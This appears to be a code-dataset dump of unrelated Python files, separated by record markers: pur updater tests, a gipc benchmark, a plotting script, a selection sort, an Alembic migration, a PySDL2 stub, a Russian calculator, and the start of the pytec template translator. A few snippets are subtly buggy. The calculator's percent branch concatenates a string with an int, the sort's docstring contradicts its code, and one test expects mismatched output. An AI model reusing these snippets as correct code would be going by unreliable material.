self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_version_in_name').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_with_extras(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-with-extras.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'firstpackage'
version = '2.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated firstpackage1: 1 -> 2.0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_extras').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_with_max_version_spec(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-with-max-version-spec.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated afakepackage: 0.9 -> 0.10.1\nUpdated afakepackage: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_max_version_spec').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_max_version_spec_prevents_updating_package(self):
requirements = 'tests/samples/requirements-with-max-version-spec.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '2.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open(tmpfile).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_notequal_version_spec_prevents_updating_package(self):
requirements = 'tests/samples/requirements-multiline.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '0.9.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open(tmpfile).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_updates_package_with_multiline_spec(self):
requirements = 'tests/samples/requirements-multiline.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '1.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated afakepackage: 0.9 -> 1.0\nUpdated afakepackage: 0.9 -> 1.0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_multiline_spec').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_does_not_update_package_with_multiline_spec(self):
requirements = 'tests/samples/requirements-multiline.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'afakepackage'
version = '1.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open(requirements).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_updates_package_with_min_version_spec(self):
requirements = 'tests/samples/requirements-with-min-version-spec.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'fakewebserver'
version = '1.8.13'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated fakewebserver: 1.8.6 -> 1.8.13\nNew version for fakewebserver found (1.8.13), but current spec prohibits updating: fakewebserver > 1.8.6, < 1.9\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_min_version_spec').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_does_not_update_package_with_wildcard_spec(self):
requirements = 'tests/samples/requirements-with-wildcard-spec.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'fakewebserver'
version = '0.9.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
expected_output = "Updated flask: 0.9 -> 0.9.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_does_not_update_package_with_wildcard_spec').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_dry_run(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile, '-d']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = '==> ' + tmpfile + ' <==\n' + \
open('tests/samples/results/test_updates_package').read() + "\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
self.assertEquals(open(tmpfile).read(), open(requirements).read())
def test_dry_run_with_nested_requirements_file(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '-d']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
expected_output = '==> ' + requirements_nested + ' <==\n' + \
open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read() + "\n" + \
'==> ' + requirements + ' <==\n' + \
open('tests/samples/results/test_updates_package_in_nested_requirements').read() + "\n"
self.assertEquals(u(result.output), u(expected_output))
expected_requirements = open('tests/samples/requirements-with-nested-reqfile.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/requirements-nested.txt').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_updates_from_alt_index_url(self):
requirements = 'tests/samples/requirements-with-alt-index-url.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
class PackageFinderSpy(PackageFinder):
_spy = None
def __init__(self, *args, **kwargs):
super(PackageFinderSpy, self).__init__(*args, **kwargs)
PackageFinderSpy._spy = self
with utils.mock.patch('pur.PackageFinder', wraps=PackageFinderSpy) as mock_finder:
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
self.runner.invoke(pur, args)
self.assertTrue(mock_finder.called)
self.assertEqual(
PackageFinderSpy._spy.index_urls,
['http://pypi.example.com', 'https://pypi2.example.com']
)
self.assertEqual(
PackageFinderSpy._spy.secure_origins,
[('*', 'pypi.example.com', '*')]
)
def test_updates_from_alt_index_url_command_line_arg(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['--index-url', 'http://pypi.example.com', '--index-url', 'http://pypi2.example.com', '-r', tmpfile]
class PackageFinderSpy(PackageFinder):
_spy = None
def __init__(self, *args, **kwargs):
super(PackageFinderSpy, self).__init__(*args, **kwargs)
PackageFinderSpy._spy = self
with utils.mock.patch('pur.PackageFinder', wraps=PackageFinderSpy) as mock_finder:
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
self.runner.invoke(pur, args)
self.assertTrue(mock_finder.called)
self.assertEqual(
PackageFinderSpy._spy.index_urls,
('http://pypi.example.com', 'http://pypi2.example.com')
)
def test_updates_from_alt_index_url_with_verify_command_line_arg(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['--index-url', 'https://pypi.internal', '--verify', '/path/to/cert/file', '-r', tmpfile]
class PackageFinderSpy(PackageFinder):
_spy = None
def __init__(self, *args, **kwargs):
super(PackageFinderSpy, self).__init__(*args, **kwargs)
PackageFinderSpy._spy = self
with utils.mock.patch('pur.PackageFinder', wraps=PackageFinderSpy) as mock_finder:
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
self.runner.invoke(pur, args)
self.assertTrue(mock_finder.called)
self.assertEqual(PackageFinderSpy._spy.index_urls, ('https://pypi.internal', ))
self.assertEqual(PackageFinderSpy._spy.session.verify, '/path/to/cert/file')
def test_interactive_choice_default(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: \nUpdated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_yes(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='y\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: y\nUpdated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_no(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='n\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: n\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_quit(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='y\nq\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: y\nUpdated flask: 0.9 -> 0.10.1\nUpdate Alembic from 0.9 to 0.10.1? (y, n, q) [y]: q\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_interactive_choice_quit').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_interactive_choice_invalid(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '-i']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args, input='z\nn\ny\nq\n')
self.assertIsNone(result.exception)
expected_output = "Update flask from 0.9 to 0.10.1? (y, n, q) [y]: z\nPlease enter either y, n, q.\nUpdate flask from 0.9 to 0.10.1? (y, n, q) [y]: n\nUpdate Alembic from 0.9 to 0.10.1? (y, n, q) [y]: y\nUpdated Alembic: 0.9 -> 0.10.1\nUpdate sqlalchemy from 0.9 to 0.10.1? (y, n, q) [y]: q\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_interactive_choice_invalid').read()
self.assertEquals(open(requirements).read(), expected_requirements)
|
StarcoderdataPython
|
3297415
|
<filename>examples/gipc_benchmark.py
# -*- coding: utf-8 -*-
# Copyright 2012-2020 Dr. <NAME>. See LICENSE file for details.
"""
Example output for Python 2.7.3 on Ubuntu 10.04 on a Xeon E5630 for
# MSG length optimized for throughput (length 64000):
14:52:07,606.2 [26430]benchmark_manager# Overall benchmark result:
14:52:07,606.3 [26430]benchmark_manager# N: 32768
14:52:07,606.4 [26430]benchmark_manager# Read duration: 1.662+/-0.005 s
14:52:07,606.4 [26430]benchmark_manager# Average msg tx rate: 19711.600+/-65.113 msgs/s
14:52:07,606.5 [26430]benchmark_manager# Payload transfer rate: 1203.101+/-3.974 MB/s
# Small messages (length 1):
14:52:14,283.6 [26430]benchmark_manager# Overall benchmark result:
14:52:14,283.7 [26430]benchmark_manager# N: 131072
14:52:14,283.7 [26430]benchmark_manager# Read duration: 1.323+/-0.001 s
14:52:14,283.8 [26430]benchmark_manager# Average msg tx rate: 99096.931+/-73.556 msgs/s
14:52:14,283.9 [26430]benchmark_manager# Payload transfer rate: 0.095+/-0.000 MB/s
"""
import os
import sys
import logging
import time
import math
import gevent
sys.path.insert(0, os.path.abspath('..'))
import gipc
logging.basicConfig(
format='%(asctime)s,%(msecs)-6.1f [%(process)d]%(funcName)s# %(message)s',
datefmt='%H:%M:%S')
log = logging.getLogger()
log = logging.getLogger()
log.setLevel(logging.INFO)
timer = time.time
if hasattr(time, 'perf_counter'):
timer = time.perf_counter
if sys.version_info[0] == 3:
xrange = range
def main():
repetitions = 3
msg = 'A' * 64000
log.info("Throughput benchmark")
log.info("Determining N ...")
benchmark_manager(msg, repetitions)
msg = "a"
log.info("Transmission benchmark")
log.info("Determining N ...")
benchmark_manager(msg, repetitions)
def benchmark_manager(msg, repetitions):
elapsed = 0
N = 1
# Find N so that benchmark lasts between 1 and two seconds
while elapsed < 1:
N *= 2
N, elapsed = benchmark(N, msg)
log.info("N = %s" % N)
log.info("Running %s benchmarks ..." % repetitions)
elapsed_values = []
# Repeat benchmark, save statistics
for _ in xrange(repetitions):
N, elapsed = benchmark(N, msg)
elapsed_values.append(elapsed)
# Evaluate stats of single run
mpertime = N/elapsed
datasize_mb = float(len(msg)*N)/1024/1024
datarate_mb = datasize_mb/elapsed
log.info(" Single benchmark result:")
log.info(" --> N: %s, MSG length: %s" % (N, len(msg)))
log.info(" --> Read duration: %.3f s" % elapsed)
log.info(" --> Average msg tx rate: %.3f msgs/s" % mpertime)
log.info(" --> Payload transfer rate: %.3f MB/s" % datarate_mb)
# Evaluate stats of all runs
e_mean = mean(elapsed_values)
e_err = pstdev(elapsed_values)/math.sqrt(len(elapsed_values)-1)
e_rel_err = e_err/e_mean
datarate_mb_mean = datasize_mb/e_mean
datarate_mb_err = datarate_mb_mean * e_rel_err
mpertime_mean = N/e_mean
mpertime_err = mpertime_mean * e_rel_err
log.info(" Overall benchmark result:")
log.info(" N: %s" % N)
log.info(" Read duration: %.3f+/-%.3f s" % (e_mean, e_err))
log.info(" Average msg tx rate: %.3f+/-%.3f msgs/s" %
(mpertime_mean, mpertime_err))
log.info(" Payload transfer rate: %.3f+/-%.3f MB/s" %
(datarate_mb_mean, datarate_mb_err))
def benchmark(N, msg):
result = None
with gipc.pipe() as (syncr, syncw):
with gipc.pipe() as (reader, writer):
p = gipc.start_process(
writer_process,
kwargs={
'writer': writer,
'syncr': syncr,
'N': N,
'msg': msg})
# Synchronize with child process
syncw.put("SYN")
assert reader.get() == "ACK"
t = timer()
while result != 'stop':
result = reader.get()
elapsed = timer() - t
p.join()
return N, elapsed
def writer_process(writer, syncr, N, msg):
with writer:
assert syncr.get() == "SYN"
writer.put("ACK")
for i in xrange(N):
writer.put(msg)
writer.put('stop')
# Credit: http://stackoverflow.com/a/27758326/145400
def mean(data):
"""Return the sample arithmetic mean of data."""
n = len(data)
if n < 1:
raise ValueError('mean requires at least one data point')
return sum(data)/float(n)
def _ss(data):
"""Return sum of square deviations of sequence data."""
c = mean(data)
ss = sum((x-c)**2 for x in data)
return ss
def pstdev(data):
"""Calculates the population standard deviation."""
n = len(data)
if n < 2:
raise ValueError('variance requires at least two data points')
ss = _ss(data)
pvar = ss/n # the population variance
return pvar**0.5
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
34622
|
<reponame>osagha/turktools<gh_stars>0
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from sympy import Symbol, solve
from sympy.abc import a, b, c
from fit_beta import fit_beta_mean_uncertainty, kl_dirichlet
RESULTS_FILE = "../results/results_beta_exp.csv"
FILTER_BY = "range"
results = pd.read_csv(RESULTS_FILE, header=0)
# Filter results by range
if "range" in FILTER_BY:
results = results[results.apply(lambda x: x["helpfulness_range"] < 0.75 and
x["prior_range"] < 0.75 and
x["posterior_range"] < 0.75, axis=1)]
if "upper_right" in FILTER_BY:
results = results[results.apply(lambda x: x["prior_mturk_july"] > 0.5 and
x["posterior_mturk_july"] > 0.5, axis=1)]
def map_certainty_to_variance(certainty):
"""
Let's just fit a line with these endpoints:
7 --> 0.001
1 --> 0.07 (the max possible value, when \alpha=\beta=1, is 0.08133333)
"""
return 0.0815 - (0.0115 * certainty)
def hyperbola_map(certainty, a, b, c):
variance = a / (certainty - c) + b
return variance
for x in np.arange(0.002, 0.07, 0.002):
params = solve([a/(1-c)+b-0.07, a/(7-c)+b-0.001, a/(6-c)+b-x])[0]
a_x, b_x, c_x = float(params[a]), float(params[b]), float(params[c])
for field in ["prior", "posterior"]:
results[field + f"_beta_{x}"] = results.apply(
lambda z: fit_beta_mean_uncertainty(z[field + "_mturk_july"],
hyperbola_map(z[field + "_certainty_july"], params[a], params[b], params[c])), axis=1)
results[f"kl_beta_{x}"] = results.apply(lambda z: kl_dirichlet(z[f"posterior_beta_{x}"], z[f"prior_beta_{x}"]), axis=1)
fig, axs = plt.subplots(1, 3, figsize=(11, 4))
g = sns.scatterplot(data=results, x="prior_mturk_july", y="posterior_mturk_july", hue="kl_july_and_mturk_probs_exp_10", ax=axs.flat[0], alpha=0.7, s=80)
g.legend_.set_title("KL")
g.title.set_text(f"Prior & Posterior vs. KL (exp)")
g.set_xlabel("Prior")
g.set_ylabel("Posterior")
g = sns.scatterplot(data=results, x="prior_mturk_july", y="posterior_mturk_july", hue="helpfulness_mean", ax=axs.flat[1], alpha=0.7, s=80)
g.legend_.set_title("Helpfulness")
g.title.set_text(f"Prior & Posterior vs. Helpfulness")
g.set_xlabel("Prior")
g.set_ylabel("")
g.set_yticklabels([])
g = sns.scatterplot(data=results, x="prior_mturk_july", y="posterior_mturk_july", hue=f"kl_beta_{x}", ax=axs.flat[2], alpha=0.7, s=80)
g.legend_.set_title("Beta KL")
g.title.set_text(f"Prior & Posterior vs. KL Beta (exp)")
g.set_xlabel("Prior")
g.set_ylabel("")
g.set_yticklabels([])
plt.subplots_adjust(left=0.05, right=0.95, wspace=0.1, )
plt.savefig(f"../figures/beta/scatter/prior_posterior_vs_helpfulness_kl_klbeta_{x}.png")
# fig.close()
# plt.savefig(f"../figures/beta/scatter/prior_posterior_vs_helpfulness_kl_klbeta_upper_right_unfiltered.png")
|
StarcoderdataPython
|
5142542
|
# selection sort
def selection(sortlist):
""" checks for the largest and then replaces - ascending order only"""
for i in range(0,len(sortlist)-1):
small = sortlist[i]
pos = i
for j in range(i+1,len(sortlist)):
if sortlist[j] < small:
small = sortlist[j]
pos = j
sortlist[pos] = sortlist[i]
sortlist[i] = small;
return sortlist
|
StarcoderdataPython
|
11354113
|
<reponame>SBRG/lifelike
"""Table schema for files.
Had to update migration file itself, rather
than a new migration file... The reason was
because changed the `id` column to Integer,
and there wasn't an easy way to set a default
value to autoincrement the primary key of an
existing column with alembic.
The `file_id` column replaced the original
purpose of the `id` column.
Revision ID: 59b6851c654e
Revises: <PASSWORD>
Create Date: 2020-04-03 11:52:12.693738
"""
from alembic import context
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '59b<PASSWORD>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
'files',
sa.Column('id', sa.Integer(), nullable=False, autoincrement=True),
sa.Column('filename', sa.String(length=60), nullable=True),
sa.Column('file_id', sa.String(length=36), nullable=False),
sa.Column('raw_file', sa.LargeBinary(), nullable=False),
sa.Column('username', sa.String(length=30), nullable=True),
sa.Column('creation_date', sa.DateTime(), nullable=True),
sa.Column('annotations',
postgresql.JSONB(astext_type=sa.Text()),
server_default='[]',
nullable=False),
sa.PrimaryKeyConstraint('id', name=op.f('pk_files')),
sa.UniqueConstraint('file_id', name=op.f('uq_files_file_id')),
)
# ### end Alembic commands ###
if context.get_x_argument(as_dictionary=True).get('data_migrate', None):
data_upgrades()
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('files')
# ### end Alembic commands ###
# NOTE: In practice perfect downgrades are difficult and in some cases
# impossible! It is more practical to use database backups/snapshots to
# "downgrade" the database. Changes to the database that we intend to
# push to production should always be added to a NEW migration.
# (i.e. "downgrade forward"!)
def data_upgrades():
"""Add optional data upgrade migrations here"""
pass
def data_downgrades():
"""Add optional data downgrade migrations here"""
pass
|
StarcoderdataPython
|
1805904
|
import sys
import sdl2
import sdl2.ext
def run():
sdl2.ext.init()
window = sdl2.ext.Window("The Pong Game", size=(800, 600))
window.show()
factory = sdl2.ext.SpriteFactory(sdl2.ext.SOFTWARE)
spriterenderer = factory.create_sprite_render_system(window)
running = True
while running:
events = sdl2.ext.get_events()
for event in events:
if event.type == sdl2.SDL_QUIT:
running = False
break
window.refresh()
return 0
if __name__ == "__main__":
sys.exit(run())
|
StarcoderdataPython
|
180315
|
what = input( 'что делаем?' '(+, -, *, /, %): ' )
a = int ( input( 'введи число 1: ' ) )
b = int ( input( 'введи число/проценты от числа "1" 2: ' ) )
p = 100
if what == '-':
c = a - b
print( str(a) + "-" + str(b) + "=" + str(c) )
elif what == '+':
c = a + b
print( str(a) + "+" + str(b) + "=" + str(c) )
if what == '*':
c = a * b
print( str(a) + "*" + str(b) + "=" + str(c) )
elif what == '/':
c = a / b
print( str(a) + "/" + str(b) + "=" + str(c) )
if what == '%':
c = b * p / a
print( str(b) + "*" + str(p) + "/" + str(a) + "=" + int(c) + "%")
|
StarcoderdataPython
|
1767593
|
#!/usr/bin/env python2
# Copyright (c) 2001 by The Regents of the University of California.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose, without fee, and without written agreement is
# hereby granted, provided that the above copyright notice and the following
# two paragraphs appear in all copies of this software.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT
# OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY OF
# CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS
# ON AN "AS IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
# Author: <NAME> <<EMAIL>>
"""
Pytec is a method to encode python scripts inside of
html documents. Due to the syntax of python, you are able
to define your own classes, methods and whatnot right in
the template file and have it work as expected.
The syntax for pytec is as follows. Inside your HTML document,
you can insert <%pytec ...python code here... %> to have
python code inside your document. Using print works as expected,
with the output going to the client in the http response.
Within the %pytec directive, you are expected to format your
code properly, as in python, whitespace is part of the grammar.
Thus, the first line must start in the first column. Note that
logic is not extended beyond the directive, so you cannot say
things like
<%pytec
if x > 0:
%>
<h1>X is greater than 0</h1>
<%pytec
else:
%>
<h1>X is less or equal to 0</h1>
You will have to wrap the HTML in print statements yourself.
Variables, however, do live beyond the directive. That is, you can
say:
<%pytec
my_var = 3
%>
<h1>some random text</h1>
<%pytec
print 'my_var = %s' % my_var
%>
Another directive is the <%= %> directive, which will evaluate the
statement therein and insert it into the html. This is good for
outputting individual variables like this:
<%pytec
my_tax_rate = .06
cost_of_shirt = 15
%>
<h1>The shirt will cost <%= cost_of_shirt * (1 + my_tax_rate) %></H1>
Last is the <%include %> directive. It expects a filename argument.
This file is interpreted as a pytec document, but plain html
will work. Also note that the program will recursively look for
include directives in the file, but avoids circular includes.
After you've written your pytec template, you run this program over
the file:
./pytec.py mytempl.pytec > mytempl.py
After this, you need to compile the python program output into java
bytecode. You use the jythonc command as follows:
jythonc -p seda.apps.Haboob.pytec -w ~/research/ mytempl.py
where the argument after -p is the package you want this class in, and
the argument after the -w is the root directory where this package
namespace lives.
The output will be a .class file usable by the Haboob web server.
<NAME> 8/15/1
<EMAIL>
"""
import re
import __builtin__
class TranslationError(Exception): pass
def read_page(filename, old_pages=None):
if not old_pages:
old_pages = []
include = re.compile('<%include (.*?)>')
old_pages.append(filename)
page = open(filename).read()
for file in include.findall(page):
if file not in old_pages:
page = re.sub('<%%include %s>' % file, read_page(file, old_pages), page)
else:
raise TranslationError, 'circular import'
return page
class TemplateTranslator:
# search strings
nondirective = re.compile('(.*?)<%', re.DOTALL)
directive = re.compile('(.*?)%>|(:)>', re.DOTALL)
non_whitespace = re.compile('\S')
